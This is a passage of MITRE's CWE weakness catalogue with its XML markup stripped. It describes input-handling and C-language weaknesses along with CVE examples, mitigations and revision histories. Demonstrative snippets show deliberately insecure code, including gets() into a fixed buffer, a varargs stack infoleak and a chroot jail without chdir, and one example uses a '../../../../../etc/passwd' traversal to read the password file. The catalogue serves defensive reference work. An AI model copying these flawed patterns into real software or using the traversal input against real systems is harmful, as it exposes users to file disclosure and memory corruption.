declare all functions. This is the recommended solution. Properly forward declaration of all used functions will result in a compiler error if too few arguments are sent to a function. + + + + + The following example demonstrates the weakness. + + foo_funct(one, two); + void foo_funct(int one, int two, int three) {printf("1) %d\n2) %d\n3) %d\n", one, two, three);} + + + void some_function(int foo, ...) {int a[3], i;va_list ap;va_start(ap, foo);for (i = 0; i < sizeof(a) / sizeof(int); i++) a[i] = va_arg(ap, int);va_end(ap);} + int main(int argc, char *argv[]) {some_function(17, 42);} + + This can be exploited to disclose information with no work whatsoever. In fact, each time this function is run, it will print out the next 4 bytes on the stack after the two numbers sent to it. + + + + + CVE-2004-0276 + Server earlier allows remote attackers to cause a denial of service (crash) via an HTTP request with a sequence of "%" characters and a missing Host field. + https://www.cve.org/CVERecord?id=CVE-2004-0276 + + + CVE-2002-1488 + Chat client allows remote malicious IRC servers to cause a denial of service (crash) via a PART message with (1) a missing channel or (2) a channel that the user is not in. + https://www.cve.org/CVERecord?id=CVE-2002-1488 + + + CVE-2002-1169 + Proxy allows remote attackers to cause a denial of service (crash) via an HTTP request to helpout.exe with a missing HTTP version numbers. + https://www.cve.org/CVERecord?id=CVE-2002-1169 + + + CVE-2000-0521 + Web server allows disclosure of CGI source code via an HTTP request without the version number. + https://www.cve.org/CVERecord?id=CVE-2000-0521 + + + CVE-2001-0590 + Application server allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification. + https://www.cve.org/CVERecord?id=CVE-2001-0590 + + + CVE-2003-0239 + Chat software allows remote attackers to cause a denial of service via malformed GIF89a headers that do not contain a GCT (Global Color Table) or an LCT (Local Color Table) after an Image Descriptor. + https://www.cve.org/CVERecord?id=CVE-2003-0239 + + + CVE-2002-1023 + Server allows remote attackers to cause a denial of service (crash) via an HTTP GET request without a URI. + https://www.cve.org/CVERecord?id=CVE-2002-1023 + + + CVE-2002-1236 + CGI crashes when called without any arguments. + https://www.cve.org/CVERecord?id=CVE-2002-1236 + + + CVE-2003-0422 + CGI crashes when called without any arguments. + https://www.cve.org/CVERecord?id=CVE-2003-0422 + + + CVE-2002-1531 + Crash in HTTP request without a Content-Length field. + https://www.cve.org/CVERecord?id=CVE-2002-1531 + + + CVE-2002-1077 + Crash in HTTP request without a Content-Length field. + https://www.cve.org/CVERecord?id=CVE-2002-1077 + + + CVE-2002-1358 + Empty elements/strings in protocol test suite affect many SSH2 servers/clients. + https://www.cve.org/CVERecord?id=CVE-2002-1358 + + + CVE-2003-0477 + FTP server crashes in PORT command without an argument. + https://www.cve.org/CVERecord?id=CVE-2003-0477 + + + CVE-2002-0107 + Resultant infoleak in web server via GET requests without HTTP/1.0 version string. + https://www.cve.org/CVERecord?id=CVE-2002-0107 + + + CVE-2002-0596 + GET request with empty parameter leads to error message infoleak (path disclosure). + https://www.cve.org/CVERecord?id=CVE-2002-0596 + + + + + Missing Parameter Error + + + Missing parameter + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry will be deprecated in a future version of CWE. The term "missing parameter" was used in both PLOVER and CLASP, with completely different meanings. However, data from both taxonomies was merged into this entry. In PLOVER, it was meant to cover malformed inputs that do not contain required parameters, such as a missing parameter in a CGI request. This entry's observed examples and classification came from PLOVER. However, the description, demonstrative example, and other information are derived from CLASP. They are related to an incorrect number of function arguments, which is already covered by CWE-685. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples + + + CWE Content Team + MITRE + 2009-03-09 + Critical + added maintenance note: this entry will probably be deprecated + + + CWE Content Team + MITRE + 2009-03-10 + updated Maintenance_Notes, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Type + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Missing Parameter Error + + + + The product does not handle or incorrectly handles when the number of parameters, fields, or arguments with the same name exceeds the expected amount. + + + + + + + + + Implementation + This typically occurs in situations when only one element is expected to be specified. + + + + + Integrity + Unexpected State + + + + + CVE-2003-1014 + MIE. multiple gateway/security products allow restriction bypass using multiple MIME fields with the same name, which are interpreted differently by clients. + https://www.cve.org/CVERecord?id=CVE-2003-1014 + + + + + Extra Parameter Error + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This type of problem has a big role in multiple interpretation vulnerabilities and various HTTP attacks. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Modes_of_Introduction, Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Description, Type + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Time_of_Introduction + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Extra Parameter Error + Failure to Handle Extra Parameter + + + + The product does not handle or incorrectly handles when a particular parameter, field, or argument name is not defined or supported by the product. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + CVE-2002-1488 + Crash in IRC client via PART message from a channel the user is not in. + https://www.cve.org/CVERecord?id=CVE-2002-1488 + + + CVE-2001-0650 + Router crash or bad route modification using BGP updates with invalid transitive attribute. + https://www.cve.org/CVERecord?id=CVE-2001-0650 + + + + + Undefined Parameter Error + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Observed_Example, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Type + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Undefined Parameter Error + Failure to Handle Undefined Parameter + + + + The product does not handle or incorrectly handles inputs that are related to complex structures. + + + + + + Integrity + Unexpected State + + + + + Element Problems + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Type + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Element Problems + + + + The product does not handle or incorrectly handles when a particular structural element is not completely specified. + + + + + + Resultant + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Missing Element Error + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Can be primary to other problems. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2009-10-29 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Type + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Missing Element Error + Failure to Handle Missing Element + + + + The product does not properly handle when a particular element is not completely specified. + + + + + + + + + + Implementation + + + + + Integrity + Other + Varies by Context + Unexpected State + + + + + CVE-2002-1532 + HTTP GET without \r\n\r\n CRLF sequences causes product to wait indefinitely and prevents other users from accessing it. + https://www.cve.org/CVERecord?id=CVE-2002-1532 + + + CVE-2003-0195 + Partial request is not timed out. + https://www.cve.org/CVERecord?id=CVE-2003-0195 + + + CVE-2005-2526 + MFV. CPU exhaustion in printer via partial printing request then early termination of connection. + https://www.cve.org/CVERecord?id=CVE-2005-2526 + + + CVE-2002-1906 + CPU consumption by sending incomplete HTTP requests and leaving the connections open. + https://www.cve.org/CVERecord?id=CVE-2002-1906 + + + + + Incomplete Element + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Observed_Example, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Type + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Incomplete Element + + + + The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize "../" sequences that can resolve to a location that is outside of that directory. + + This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. + The "../" manipulation is the canonical manipulation for operating systems that use "/" as directory separators, such as UNIX- and Linux-based systems. In some cases, it is useful for bypassing protection schemes in environments for which "/" is supported but not the primary separator, such as Windows, which uses "\" but can also accept "/". + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + '../filedir + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Dot Dot Slash - '../filedir' + + + + The product does not handle or incorrectly handles when two or more structural elements should be consistent, but are not. + + + + + + + + + + Implementation + + + + + Integrity + Other + Varies by Context + Unexpected State + + + + + Inconsistent Elements + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Type + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Inconsistent Elements + Failure to Resolve Inconsistent Elements + + + + The product does not handle or incorrectly handles when a particular element is not the expected type, e.g. it expects a digit (0-9) but is provided with a letter (A-Z). + + + + + + + + + Implementation + + + + + Integrity + Other + Varies by Context + Unexpected State + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-1999-1156 + FTP server crash via PORT command with non-numeric character. + https://www.cve.org/CVERecord?id=CVE-1999-1156 + + + CVE-2004-0270 + Anti-virus product has assert error when line length is non-numeric. + https://www.cve.org/CVERecord?id=CVE-2004-0270 + + + + + Wrong Data Type + + + FIO37-C + Do not assume that fgets() or fgetws() returns a nonempty string when successful + CWE More Abstract + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Probably under-studied. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-10-29 + updated Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Wrong Data Type + Failure to Handle Wrong Data Type + + + + The product calls a function that can never be guaranteed to work safely. + Certain functions behave in dangerous ways regardless of how they are used. Functions in this category were often implemented without taking security concerns into account. The gets() function is unsafe because it does not perform bounds checking on the size of its input. An attacker can easily send arbitrarily-sized input to gets() and overflow the destination buffer. Similarly, the >> operator is unsafe to use when reading into a statically-allocated character array because it does not perform bounds checking on the size of its input. An attacker can easily send arbitrarily-sized input to the >> operator and overflow the destination buffer. + + + + + + Primary + + + + + + + + + Implementation + + + High + + + Other + Varies by Context + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Requirements + Ban the use of dangerous functions. Use their safe equivalent. + + + Testing + Use grep or static analysis tools to spot usage of dangerous functions. + + + + + The code below calls gets() to read information into a buffer. + + char buf[BUFSIZE];gets(buf); + + The gets() function in C is inherently unsafe. + + + The code below calls the gets() function to read in data from the command line. + + + char buf[24];printf("Please enter your name and press <Enter>\n");gets(buf);...} + + However, gets() is inherently unsafe, because it copies all input from STDIN to the buffer without checking size. This allows the user to provide a string that is larger than the buffer size, resulting in an overflow condition. + + + + + Dangerous Functions + + + POS33-C + Do not use vfork() + CWE More Abstract + + + SFP3 + Use of an improper API + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Type, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes, References + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Dangerous Functions + Use of Inherently Dangerous Functions + + + + The product uses the chroot() system call to create a jail, but does not change the working directory afterward. This does not prevent access to files outside of the jail. + Improper use of chroot() may allow attackers to escape from the chroot jail. The chroot() function call does not change the process's current working directory, so relative paths may still refer to file system resources outside of the chroot jail after chroot() has been called. + + + + + + + Resultant + + + + + + + + + The chroot() system call allows a process to change its perception of the root directory of the file system. After properly invoking chroot(), a process cannot access any files outside the directory tree defined by the new root directory. Such an environment is called a chroot jail and is commonly used to prevent the possibility that a processes could be subverted and used to access unauthorized files. For instance, many FTP servers run in chroot jails to prevent an attacker who discovers a new vulnerability in the server from being able to download the password file or other sensitive files on the system. + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + High + + + Confidentiality + Read Files or Directories + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Consider the following source code from a (hypothetical) FTP server: + + chroot("/var/ftproot");...fgets(filename, sizeof(filename), network);localfile = fopen(filename, "r");while ((len = fread(buf, 1, sizeof(buf), localfile)) != EOF) {fwrite(buf, 1, sizeof(buf), network);}fclose(localfile); + + This code is responsible for reading a filename from the network, opening the corresponding file on the local machine, and sending the contents over the network. This code could be used to implement the FTP GET command. The FTP server calls chroot() in its initialization routines in an attempt to prevent access to files outside of /var/ftproot. But because the server does not change the current working directory by calling chdir("/"), an attacker could request the file "../../../../../etc/passwd" and obtain a copy of the system password file. + + + + File or Directory + + + + Directory Restriction + + + SFP17 + Failed chroot jail + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Background_Details, Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-03-10 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-12-13 + updated Demonstrative_Examples, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Causal_Nature, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Directory Restriction + Failure to Change Working Directory in chroot Jail + + + + Using realloc() to resize buffers that store sensitive information can leave the sensitive information exposed to attack, because it is not removed from memory. + When sensitive data such as a password or an encryption key is not removed from memory, it could be exposed to an attacker using a "heap inspection" attack that reads the sensitive data using memory dumps or other methods. The realloc() function is commonly used to increase the size of a block of allocated memory. This operation often requires copying the contents of the old memory block into a new and larger block. This operation leaves the contents of the original block intact but inaccessible to the program, preventing the program from being able to scrub sensitive data from memory. If an attacker can later examine the contents of a memory dump, the sensitive data could be exposed. + + + + + + + + + + + Implementation + + + + + Confidentiality + Other + Read Memory + Other + Be careful using vfork() and fork() in security sensitive code. The process state will not be cleaned up and will contain traces of data from past use. + + + + + The following code calls realloc() on a buffer containing sensitive data: + + cleartext_buffer = get_secret();...cleartext_buffer = realloc(cleartext_buffer, 1024);...scrub_memory(cleartext_buffer, 1024); + + There is an attempt to scrub the sensitive data from memory, but realloc() is used, so it could return a pointer to a different part of memory. The memory that was originally allocated for cleartext_buffer could still contain an uncleared copy of the data. + + + + Memory + + + + Heap Inspection + + + MEM03-C + Clear sensitive information stored in reusable resources returned for reuse + + + SFP23 + Exposed Data + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Name, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Relationships + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples, Name + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences, Description, 